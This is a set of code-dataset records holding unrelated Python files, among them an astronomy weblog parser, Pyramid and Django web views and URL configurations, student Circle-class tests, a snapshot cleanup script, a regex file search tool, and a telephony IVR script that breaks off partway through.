"en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "yacore.fabric.models.DockerContainer", "line_number": 22, "usage_type": "name"}, {"api_name": "yacore.db.Column", "line_number": 25, "usage_type": "call"}, {"api_name": "yacore.db", "line_number": 25, "usage_type": "name"}, {"api_name": "yacore.db.Integer", "line_number": 25, "usage_type": "attribute"}, {"api_name": "yacore.db.ForeignKey", "line_number": 25, "usage_type": "call"}, {"api_name": "yacore.db.Column", "line_number": 26, "usage_type": "call"}, {"api_name": "yacore.db", "line_number": 26, "usage_type": "name"}, {"api_name": "yacore.db.Integer", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask.abort", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "68417604", "text": "import os\nimport numpy as np\nfrom astropy import table\nfrom astropy import units as u\nimport re\n\ndef get_human_readable_name(weblog):\n\n for directory, dirnames, filenames in os.walk(weblog):\n if 't2-1_details.html' in filenames:\n #print(\"Found {0}:{1}\".format(directory, \"t2-1_details.html\"))\n with open(os.path.join(directory, 't2-1_details.html')) as fh:\n txt 
= fh.read()\n\n max_baseline = re.compile(\"Max Baseline\\s*([0-9a-z\\. ]*)\").search(txt).groups()[0]\n max_baseline = u.Quantity(max_baseline)\n\n array_name = ('7MorTP' if max_baseline < 100*u.m else 'TM2'\n if max_baseline < 1000*u.m else 'TM1')\n #print(\"array_name = {0}\".format(array_name))\n break\n\n for directory, dirnames, filenames in os.walk(weblog):\n if 't2-2-3.html' in filenames:\n with open(os.path.join(directory, 't2-2-3.html')) as fh:\n txt = fh.read()\n array_table = table.Table.read(txt, format='ascii.html')\n antenna_size, = map(int, set(array_table['Diameter']))\n break\n\n for directory, dirnames, filenames in os.walk(weblog):\n if 't2-2-2.html' in filenames:\n with open(os.path.join(directory, 't2-2-2.html')) as fh:\n txt = fh.read()\n\n array_table = table.Table.read(txt, format='ascii.html')\n band_string, = set(array_table['Band'])\n band = int(band_string.split()[-1])\n break\n\n for directory, dirnames, filenames in os.walk(weblog):\n if 't2-2-1.html' in filenames:\n with open(os.path.join(directory, 't2-2-1.html')) as fh:\n txt = fh.read()\n\n array_table = table.Table.read(txt, format='ascii.html')\n mask = np.array(['TARGET' in intent for intent in array_table['Intent']], dtype='bool')\n source_name, = set(array_table[mask]['Source Name'])\n break\n\n if array_name == '7MorTP':\n if antenna_size == 7:\n array_name = '7M'\n elif antenna_size == 12:\n array_name = 'TP'\n else:\n raise\n\n sbname = \"{0}_a_{1:02d}_{2}\".format(source_name, band, array_name, )\n\n print(sbname, max_baseline)\n\n return sbname\n\ndef weblog_names(list_of_weblogs):\n return {get_human_readable_name(weblog): weblog\n for weblog in list_of_weblogs}\n\ndef make_links(weblog_maps):\n reverse_map = {v:k for k,v in weblog_maps.items()}\n assert len(reverse_map) == len(weblog_maps)\n\n for k,v in weblog_maps.items():\n try:\n os.symlink('../{0}'.format(v), 'humanreadable/{0}'.format(k))\n except FileExistsError:\n pass\n", "sub_path": "reduction/parse_weblog.py", "file_name": "parse_weblog.py", "file_ext": "py", "file_size_in_byte": 2746, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.walk", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 15, "usage_type": "call"}, {"api_name": "astropy.units.Quantity", "line_number": 16, "usage_type": "call"}, {"api_name": "astropy.units", "line_number": 16, "usage_type": "name"}, {"api_name": "astropy.units.m", "line_number": 18, "usage_type": "attribute"}, {"api_name": "astropy.units", "line_number": 18, "usage_type": "name"}, {"api_name": "astropy.units.m", "line_number": 19, "usage_type": "attribute"}, {"api_name": "astropy.units", "line_number": 19, "usage_type": "name"}, {"api_name": "os.walk", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "astropy.table.Table.read", "line_number": 27, "usage_type": "call"}, {"api_name": "astropy.table.Table", "line_number": 27, "usage_type": "attribute"}, {"api_name": "astropy.table", "line_number": 27, "usage_type": "name"}, {"api_name": "os.walk", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, 
"usage_type": "attribute"}, {"api_name": "astropy.table.Table.read", "line_number": 36, "usage_type": "call"}, {"api_name": "astropy.table.Table", "line_number": 36, "usage_type": "attribute"}, {"api_name": "astropy.table", "line_number": 36, "usage_type": "name"}, {"api_name": "os.walk", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "astropy.table.Table.read", "line_number": 46, "usage_type": "call"}, {"api_name": "astropy.table.Table", "line_number": 46, "usage_type": "attribute"}, {"api_name": "astropy.table", "line_number": 46, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "os.symlink", "line_number": 75, "usage_type": "call"}]} +{"seq_id": "174804826", "text": "from filteredfanfiction.models.models import DBSession, Language, Genre, Race, Character, Rating, Category\nfrom pyramid.view import view_config\nfrom filteredfanfiction.helpers.search_term_validator import SearchTermValidator\nfrom filteredfanfiction.helpers.mobiledetector import is_mobile\nimport transaction\n \n@view_config(route_name='searchstate', renderer='json', request_method='GET')\n@view_config(route_name='savedsearchstate', renderer='json', request_method='GET')\ndef SearchState(request):\n session = DBSession()\n request.add_finished_callback(RequestCleanup)\n validator = SearchTermValidator(session, matchdict = request.matchdict)\n characters = session.query(Character).filter(Character.categoryid == validator.category).order_by(Character.name)\n category = session.query(Category).filter(Category.idcategory == validator.category).first()\n\n results = dict()\n results['category'] = { 'name': category.name, 'id': category.idcategory }\n results['query'] = validator.query\n results['completeRequired'] = validator.completeRequired\n\n reqdGenres = validator.requiredGenresSet\n reqdGenreList = [] if len(reqdGenres) == 0 else [g for g in session.query(Genre).filter(Genre.idgenre.in_(reqdGenres)).order_by(Genre.name)]\n\n otherGenresSet = validator.otherGenresSet \n otherGenres = otherGenresSet[0] - reqdGenres\n otherGenreList = [] if len(otherGenres) == 0 else [g for g in session.query(Genre).filter(Genre.idgenre.in_(otherGenres)).order_by(Genre.name)]\n\n usedGenres = reqdGenres | otherGenres\n usedGenreQuery = session.query(Genre)\n if len(usedGenres) > 0:\n usedGenreQuery = usedGenreQuery.filter(~Genre.idgenre.in_(usedGenres))\n\n results['genres'] = {'required': [{'name': genre.name, \n 'id': genre.idgenre}\n for genre in reqdGenreList],\n 'other': [{'name': genre.name, \n 'id': genre.idgenre}\n for genre in otherGenreList],\n 'otherIsExclude': otherGenresSet[1],\n 'unused': [{'name': genre.name, \n 'id': genre.idgenre}\n for genre in usedGenreQuery.order_by(Genre.name)]}\n \n reqdChars = validator.requiredCharactersSet\n reqdCharList = [] if len(reqdChars) == 0 else [c for c in session.query(Character).filter(Character.idcharacter.in_(reqdChars)).order_by(Character.name).outerjoin(Race).add_column(Race.name)]\n \n otherCharsSet = validator.otherCharactersSet \n otherChars = otherCharsSet[0] - reqdChars\n otherCharList = [] if len(reqdChars) == 0 else [c for c in session.query(Character).filter(Character.idcharacter.in_(otherChars)).order_by(Character.name).outerjoin(Race).add_column(Race.name)]\n\n usedChars = reqdChars | otherChars\n usedCharQuery = session.query(Character).filter(Character.categoryid == 
category.idcategory).outerjoin(Race).add_column(Race.name)\n if len(usedChars) > 0:\n usedCharQuery = usedCharQuery.filter(~Character.idcharacter.in_(usedChars))\n\n results['characters'] = {'required': [{'name': character.name, \n 'id': character.idcharacter,\n 'gender': character.gender,\n 'race': (\"Unknown\" if raceName is None else raceName)}\n for (character, raceName) in reqdCharList],\n 'other': [{'name': character.name, \n 'id': character.idcharacter,\n 'gender': character.gender,\n 'race': (\"Unknown\" if raceName is None else raceName)}\n for (character, raceName) in otherCharList],\n 'otherIsExclude': otherCharsSet[1],\n 'unused': [{'name': character.name, \n 'id': character.idcharacter,\n 'gender': character.gender,\n 'race': (\"Unknown\" if raceName is None else raceName)}\n for (character, raceName) in usedCharQuery.order_by(Character.name)]}\n \n results['knownGenders'] = [\"Male\", \"Female\", \"Object\"];\n knownRaces = set([c['race'] for c in results['characters']['required']])\n knownRaces.update([c['race'] for c in results['characters']['other']])\n knownRaces.update([c['race'] for c in results['characters']['unused']])\n results['knownRaces'] = sorted(knownRaces)\n\n checkedRatings = validator.ratingsSet\n results['ratings'] = [{ 'name': rating.name,\n 'id': rating.idrating,\n 'selected': rating.idrating in checkedRatings}\n for rating in session.query(Rating).order_by(Rating.idrating)]\n\n checkedLanguages = validator.languagesSet\n results['languages'] = [{ 'name': language.name,\n 'id': language.idlanguage,\n 'selected': language.idlanguage in checkedLanguages}\n for language in session.query(Language).order_by(Language.name)]\n\n activeOption = validator.sortOption\n results['sorting'] = { 'reverseOrder': validator.sortOrder == \"asc\",\n 'options': [{ 'name': \"Average DLP Score\",\n 'id': \"dlpavgscore\",\n 'selected': \"dlpavgscore\" == activeOption}, \n { 'name': \"Average Reviews\",\n 'id': \"avgreviews\",\n 'selected': \"avgreviews\" == activeOption},\n { 'name': \"Chapters\", \n 'id': \"chapters\",\n 'selected': \"chapters\" == activeOption}, \n { 'name': \"Chapter Length\", \n 'id': \"chapterlength\",\n 'selected': \"chapterlength\" == activeOption},\n { 'name': \"Published\",\n 'id': \"published\",\n 'selected': \"published\" == activeOption},\n { 'name': \"Reviews\", \n 'id': \"reviews\",\n 'selected': \"reviews\" == activeOption}, \n { 'name': \"Total DLP Reviews\", \n 'id': \"dlpvotes\",\n 'selected': \"dlpvotes\" == activeOption}, \n { 'name': \"Total DLP Score\", \n 'id': \"dlpscore\",\n 'selected': \"dlpscore\" == activeOption},\n { 'name': \"Updated\",\n 'id': \"updated\",\n 'selected': \"updated\" == activeOption}, \n { 'name': \"Update Speed\",\n 'id': \"speed\",\n 'selected': \"speed\" == activeOption}, \n { 'name': \"Words\",\n 'id': \"words\",\n 'selected': \"words\" == activeOption} ]}\n\n results['ranges'] = { 'chapters': { 'min': validator.min(validator.chapters),\n 'max': validator.max(validator.chapters)},\n 'words': { 'min': validator.min(validator.words),\n 'max': validator.max(validator.words)},\n 'length': { 'min': validator.min(validator.chapterLength),\n 'max': validator.max(validator.chapterLength)},\n 'reviews': { 'min': validator.min(validator.reviews),\n 'max': validator.max(validator.reviews)},\n 'avgreviews': { 'min': validator.min(validator.averageReviews),\n 'max': validator.max(validator.averageReviews)},\n 'dlpvotes': { 'min': validator.min(validator.dlpVotes),\n 'max': validator.max(validator.dlpVotes)},\n 'dlpscore': { 
'min': validator.min(validator.dlpScore),\n 'max': validator.max(validator.dlpScore)},\n 'dlpavgscore': { 'min': validator.minFloat(validator.dlpAvgScore),\n 'max': validator.maxFloat(validator.dlpAvgScore)} }\n \n return results\n\ndef RequestCleanup(request):\n if request.exception is not None:\n transaction.abort()\n else:\n transaction.commit()\n DBSession.Finalize()\n\n", "sub_path": "filteredfanfiction/views/ajax.py", "file_name": "ajax.py", "file_ext": "py", "file_size_in_byte": 9631, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "filteredfanfiction.models.models.DBSession", "line_number": 10, "usage_type": "call"}, {"api_name": "filteredfanfiction.helpers.search_term_validator.SearchTermValidator", "line_number": 12, "usage_type": "call"}, {"api_name": "filteredfanfiction.models.models.Character", "line_number": 13, "usage_type": "argument"}, {"api_name": "filteredfanfiction.models.models.Character.categoryid", "line_number": 13, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Character.name", "line_number": 13, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Category", "line_number": 14, "usage_type": "argument"}, {"api_name": "filteredfanfiction.models.models.Category.idcategory", "line_number": 14, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Genre", "line_number": 22, "usage_type": "argument"}, {"api_name": "filteredfanfiction.models.models.Genre.idgenre.in_", "line_number": 22, "usage_type": "call"}, {"api_name": "filteredfanfiction.models.models.Genre.idgenre", "line_number": 22, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Genre.name", "line_number": 22, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Genre", "line_number": 26, "usage_type": "argument"}, {"api_name": "filteredfanfiction.models.models.Genre.idgenre.in_", "line_number": 26, "usage_type": "call"}, {"api_name": "filteredfanfiction.models.models.Genre.idgenre", "line_number": 26, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Genre.name", "line_number": 26, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Genre", "line_number": 29, "usage_type": "argument"}, {"api_name": "filteredfanfiction.models.models.Genre.idgenre.in_", "line_number": 31, "usage_type": "call"}, {"api_name": "filteredfanfiction.models.models.Genre.idgenre", "line_number": 31, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Genre", "line_number": 31, "usage_type": "name"}, {"api_name": "filteredfanfiction.models.models.Genre.name", "line_number": 42, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Genre", "line_number": 42, "usage_type": "name"}, {"api_name": "filteredfanfiction.models.models.Race", "line_number": 45, "usage_type": "argument"}, {"api_name": "filteredfanfiction.models.models.Character", "line_number": 45, "usage_type": "argument"}, {"api_name": "filteredfanfiction.models.models.Character.idcharacter.in_", "line_number": 45, "usage_type": "call"}, {"api_name": "filteredfanfiction.models.models.Character.idcharacter", "line_number": 45, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Character.name", "line_number": 45, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Race.name", "line_number": 45, "usage_type": "attribute"}, {"api_name": 
"filteredfanfiction.models.models.Race", "line_number": 49, "usage_type": "argument"}, {"api_name": "filteredfanfiction.models.models.Character", "line_number": 49, "usage_type": "argument"}, {"api_name": "filteredfanfiction.models.models.Character.idcharacter.in_", "line_number": 49, "usage_type": "call"}, {"api_name": "filteredfanfiction.models.models.Character.idcharacter", "line_number": 49, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Character.name", "line_number": 49, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Race.name", "line_number": 49, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Race", "line_number": 52, "usage_type": "argument"}, {"api_name": "filteredfanfiction.models.models.Character", "line_number": 52, "usage_type": "argument"}, {"api_name": "filteredfanfiction.models.models.Character.categoryid", "line_number": 52, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Race.name", "line_number": 52, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Character.idcharacter.in_", "line_number": 54, "usage_type": "call"}, {"api_name": "filteredfanfiction.models.models.Character.idcharacter", "line_number": 54, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Character", "line_number": 54, "usage_type": "name"}, {"api_name": "filteredfanfiction.models.models.Character.name", "line_number": 71, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Character", "line_number": 71, "usage_type": "name"}, {"api_name": "filteredfanfiction.models.models.Rating", "line_number": 83, "usage_type": "argument"}, {"api_name": "filteredfanfiction.models.models.Rating.idrating", "line_number": 83, "usage_type": "attribute"}, {"api_name": "filteredfanfiction.models.models.Language", "line_number": 89, "usage_type": "argument"}, {"api_name": "filteredfanfiction.models.models.Language.name", "line_number": 89, "usage_type": "attribute"}, {"api_name": "pyramid.view.view_config", "line_number": 7, "usage_type": "call"}, {"api_name": "pyramid.view.view_config", "line_number": 8, "usage_type": "call"}, {"api_name": "transaction.abort", "line_number": 148, "usage_type": "call"}, {"api_name": "transaction.commit", "line_number": 150, "usage_type": "call"}, {"api_name": "filteredfanfiction.models.models.DBSession.Finalize", "line_number": 151, "usage_type": "call"}, {"api_name": "filteredfanfiction.models.models.DBSession", "line_number": 151, "usage_type": "name"}]} +{"seq_id": "628091612", "text": "# -*- coding:utf-8 -*-\n\"\"\"\n@author:zhouqiuhong\n@file:urls.py\n@time:2018/8/7 000718:13\n\"\"\"\nfrom django.conf.urls import url, include\nfrom .views import OrgView, UserAskView, OrgHomeView, OrgCourseView, OrgDescView, OrgTeacherView, AddFavView, TeacherListView\nfrom .views import TeacherDetailView\n\nurlpatterns = [\n url(r\"^list/$\", OrgView.as_view(), name=\"org_list\"),\n url(r\"^add_ask/$\", UserAskView.as_view(), name=\"add_ask\"),\n url(r\"^home/(?P\\d+)/$\", OrgHomeView.as_view(), name=\"org_home\"),\n url(r\"^course/(?P\\d+)/$\", OrgCourseView.as_view(), name=\"org_course\"),\n url(r\"^desc/(?P\\d+)/$\", OrgDescView.as_view(), name=\"org_desc\"),\n url(r\"^org_teacher/(?P\\d+)/$\", OrgTeacherView.as_view(), name=\"org_teacher\"),\n #用户收藏\n url(r\"^add_fav/$\", AddFavView.as_view(), name=\"add_fav\"),\n #讲师列表页\n url(r\"^teacher/list/$\", TeacherListView.as_view(), name=\"teacher_list\"),\n #讲师详情页面\n 
url(r\"^teacher/detail/(?P\\d+)/$\", TeacherDetailView.as_view(), name=\"teacher_detail\"),\n]", "sub_path": "apps/organization/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1065, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "views.OrgView.as_view", "line_number": 12, "usage_type": "call"}, {"api_name": "views.OrgView", "line_number": 12, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "views.UserAskView.as_view", "line_number": 13, "usage_type": "call"}, {"api_name": "views.UserAskView", "line_number": 13, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "views.OrgHomeView.as_view", "line_number": 14, "usage_type": "call"}, {"api_name": "views.OrgHomeView", "line_number": 14, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "views.OrgCourseView.as_view", "line_number": 15, "usage_type": "call"}, {"api_name": "views.OrgCourseView", "line_number": 15, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "views.OrgDescView.as_view", "line_number": 16, "usage_type": "call"}, {"api_name": "views.OrgDescView", "line_number": 16, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "views.OrgTeacherView.as_view", "line_number": 17, "usage_type": "call"}, {"api_name": "views.OrgTeacherView", "line_number": 17, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 19, "usage_type": "call"}, {"api_name": "views.AddFavView.as_view", "line_number": 19, "usage_type": "call"}, {"api_name": "views.AddFavView", "line_number": 19, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 21, "usage_type": "call"}, {"api_name": "views.TeacherListView.as_view", "line_number": 21, "usage_type": "call"}, {"api_name": "views.TeacherListView", "line_number": 21, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 23, "usage_type": "call"}, {"api_name": "views.TeacherDetailView.as_view", "line_number": 23, "usage_type": "call"}, {"api_name": "views.TeacherDetailView", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "609413578", "text": "from django.conf.urls import url\nfrom . 
import views\n\napp_name = 'Series'\n\nurlpatterns = [\n\turl('chapter/(?P[-\\w]+)/$', views.ChapterDetailView.as_view(), name=\"ChapterDetail\"),\n\turl('serie/(?P[-\\w]+)/$', views.SerieDetailView.as_view(), name=\"SerieDetail\"),\n\turl('series/$', views.SeriesListView.as_view(), name=\"SeriesList\"),\n]", "sub_path": "series/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 341, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "407587726", "text": "from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\n\nfrom .views import (DepartmentViewSet, RoomViewSet, UserViewSet,\n UserInfoView, PermissionsView)\n\n\napp_name = 'account'\n\nrouter = DefaultRouter()\nrouter.register('department', DepartmentViewSet, base_name='department')\nrouter.register('room', RoomViewSet, base_name='room')\nrouter.register('user', UserViewSet, base_name='user')\n\n\nurlpatterns = [\n path('', include(router.urls)),\n path('info/', UserInfoView.as_view()),\n path('permission/', PermissionsView.as_view())\n]\n", "sub_path": "account/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 610, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "rest_framework.routers.DefaultRouter", "line_number": 10, "usage_type": "call"}, {"api_name": "views.DepartmentViewSet", "line_number": 11, "usage_type": "argument"}, {"api_name": "views.RoomViewSet", "line_number": 12, "usage_type": "argument"}, {"api_name": "views.UserViewSet", "line_number": 13, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 17, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "views.UserInfoView.as_view", "line_number": 18, "usage_type": "call"}, {"api_name": "views.UserInfoView", "line_number": 18, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "views.PermissionsView.as_view", "line_number": 19, "usage_type": "call"}, {"api_name": "views.PermissionsView", "line_number": 19, "usage_type": "name"}]} +{"seq_id": "175855111", "text": "#!/usr/bin/env python3\n\n\"\"\" Test code for sparse_array.py.\"\"\"\n\nimport pytest\nfrom sparse_array import *\n\ndef test_radius():\n c = Circle(4)\n \n print(c.radius)\n assert c.radius == 4\n\ndef test_diameter():\n c = Circle(4)\n \n print(c.diameter)\n assert c.diameter == 8\n\ndef test_set_diameter():\n c = Circle(4)\n \n c.diameter = 2\n print(c.diameter)\n print(c.radius)\n \n assert c.diameter == 2\n assert c.radius == 1\n\ndef test_area():\n c = Circle(4)\n \n print(c.area)\n assert c.area == 50.27\n\ndef test_set_area():\n c = Circle(4)\n \n with pytest.raises(AttributeError):\n c.area = 42\n \n print(c.area)\n\ndef test_from_diameter():\n c = Circle.from_diameter(8)\n \n print(c.diameter)\n print(c.radius)\n \n assert c.diameter == 8\n assert c.radius == 4\n\ndef test_print():\n c = Circle(4)\n d = eval(repr(c))\n \n print(c)\n print(repr(c))\n print(d)\n \n assert c == 'Circle with radius: 4.000000'\n assert repr(c) == \"'Circle(4)'\"\n 
assert d == 'Circle(4)'\n\ndef test_math():\n c1 = Circle(2)\n c2 = Circle(4)\n \n print(c1 + c2)\n print(c2 * 3)\n print(3 * c2)\n \n assert c1 + c2 == Circle(6)\n assert c2 * 3 == Circle(12)\n #add assert to deal with 3 * c2\n\ndef test_compare():\n c1 = Circle(2)\n c2 = Circle(4)\n c3 = Circle(4)\n \n assert c1 > c2 is False\n assert c1 < c2 is True\n assert c1 == c2 is False\n assert c2 == c3 is True\n\ndef test_sort():\n circles = [Circle(2), Circle(4), Circle(4), Circle(3), Circle(8), Circle(6)]\n circles.sort()\n print(circles)\n \n assert circles == [Circle(2), Circle(3), Circle(4), Circle(4), Circle(6), Circle(8)]\n\n#def test_sphere_subclass():\n #add tests for sphere subclass", "sub_path": "students/thecthaeh/Lesson08/test_sparse_array.py", "file_name": "test_sparse_array.py", "file_ext": "py", "file_size_in_byte": 1766, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pytest.raises", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "557677015", "text": "import sys\nimport requests\nimport json\nfrom datetime import datetime as dt\n\ntime_format='%Y-%m-%dT%H:%M:%S.%fZ'\ndatabaseName='databaseName'\ncreation='createdAt'\nsnapshots_path = None\nserver= None\n\ndef get_json_data():\n response = requests.get(server+snapshots_path)\n if (response.status_code >= 200 and response.status_code <= 299):\n return json.loads(response.text)['snapshotItems']\n else:\n print(f'Response code: {response.status_code}')\n exit(1)\n\ndef list_all_by_DB():\n snapshots={}\n json=get_json_data()\n time_sorted_snaps = sorted(json, key=lambda x: dt.strptime(x[creation], time_format), reverse=True)\n for obj in time_sorted_snaps:\n db=obj[databaseName]\n if not db in snapshots:\n snapshots[db]=[]\n snapshots[db].append(obj)\n return snapshots\n\ndef do_by_id(id,method):\n if(method=='GET'):\n response = requests.get(server+snapshots_path+str(id))\n if (response.status_code >= 200 and response.status_code <= 299):\n print(response.text)\n return True\n else:\n print(f'Response code: {response.status_code}')\n elif (method=='DELETE'):\n response = requests.delete(server+snapshots_path+str(id))\n if (response.status_code >= 200 and response.status_code <= 299):\n return True\n else:\n print(f'Response code: {response.status_code}')\n\ndef main(argv):\n global server\n server = argv[1] #'https://5dbf2fb9e295da001400b4cc.mockapi.io'\n global snapshots_path\n snapshots_path = argv[2] #'/api/v1/snapshots/'\n all_snaps=list_all_by_DB()\n for db_name in all_snaps:\n db=all_snaps[db_name]\n if len(db) > 2:\n i=1\n for snap in db[2:]:\n do_by_id(int(snap['id']),'DELETE')\n\n print(\"done\")\nif __name__ == '__main__':\n main(sys.argv)", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1883, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requests.get", "line_number": 13, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 23, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 33, "usage_type": "call"}, {"api_name": "requests.delete", "line_number": 40, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 61, "usage_type": "attribute"}]} +{"seq_id": "427034709", "text": "#! 
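A real pitfall in the test_sparse_array record above: test_compare writes `assert c1 > c2 is False`, which Python chains as `(c1 > c2) and (c2 is False)`; that is always false for Circle objects, so the assert can never pass. A self-contained demonstration of the chaining, plus the spellings the tests presumably meant:

a, b = 2, 4
# Chaining, not grouping: both sides below evaluate to False for these values.
assert (a > b is False) == ((a > b) and (b is False))
# Intended forms:
assert not (a > b)
assert a < b
assert a != b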
python3\n\nimport argparse\nimport re, sys\nimport os\n\n\ndef search_files(words, file, reg):\n # print(words)\n # create regex object\n # search file for regex pattern and return to caller if found\n regex = \"r\\'\" + reg + \"\\'\"\n # print(regex)\n\n try:\n regex = re.compile(reg)\n for word in words:\n # print(word)\n found = regex.search(word)\n if found:\n print(found.group(), file)\n except Exception as e:\n print(\"Error is: \" + str(e))\n\n\ndef parseArg():\n parser = argparse.ArgumentParser(usage=sys.argv[0] + ' -r [-h]')\n parser.add_argument('-r', dest='reg', help='specify regex string to search')\n options = parser.parse_args()\n reg = options.reg\n if reg is None:\n print(parser.usage)\n else:\n return reg\n\n\ndef main():\n files_found = []\n regex_string = parseArg()\n text_files = [x for x in os.listdir('.') if os.path.basename(x).endswith('.txt')]\n # print(text_files)\n for file in text_files:\n with open(file, 'r') as f:\n file_contents = f.read()\n words = [x for x in str(file_contents).split(' ')]\n # print(file_contents)\n files_found.append(search_files(words, file, regex_string))\n\n\nif __name__ == \"__main__\":\n main()", "sub_path": "PycharmProjects/AutoBoringStuff/regexSearch.py", "file_name": "regexSearch.py", "file_ext": "py", "file_size_in_byte": 1315, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "re.compile", "line_number": 16, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 27, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}]} +{"seq_id": "590566841", "text": "from apidaze.script import Builder, Record, Answer, Echo, Speak, Wait\nfrom apidaze.script import Bind, SpeakLanguages, Conference, Playback, Ringback\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\n\n\ndef intro(localurl):\n builder = Builder()\n ringback = Ringback(file='FR')\n wait8 = Wait(8)\n answer = Answer()\n record = Record(name='example_recording')\n wait = Wait(delay=2)\n playback = Playback(file=f'{localurl}/apidazeintro.wav')\n speak = Speak(text='This example script will show you some things you can do with our API')\n\n builder.add(ringback).add(wait8).add(answer).add(record).add(wait).add(\n playback).add(speak).add(wait)\n\n speak = Speak(text='Press 1 for an example of text to speech, press 2 to enter an echo line to check voice latency or press 3 to enter a conference.')\n bind1 = Bind(action=f'{localurl}/step1.xml', text='1')\n bind2 = Bind(action=f'{localurl}/step2.xml', text='2')\n bind3 = Bind(action=f'{localurl}/step3.xml', text='3')\n speak.add(bind1).add(bind2).add(bind3)\n\n builder.add(speak)\n\n return str(builder)\n\n\ndef step1():\n builder = Builder()\n speak = Speak(text=\"Our text to speech leverages Google's cloud APIs to offer the best possible solution\")\n wait1 = Wait(delay=1)\n\n builder.add(speak).add(wait1)\n\n speak = Speak(text='A wide variety of voices and languages are available. 
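Aside: in the regexSearch.py record above, the line that builds `"r\'" + reg + "\'"` only produces the literal text r'...'; the r-prefix is source-code syntax with no runtime meaning, and the variable is immediately overwritten by re.compile(reg), which is the part that matters:

import re

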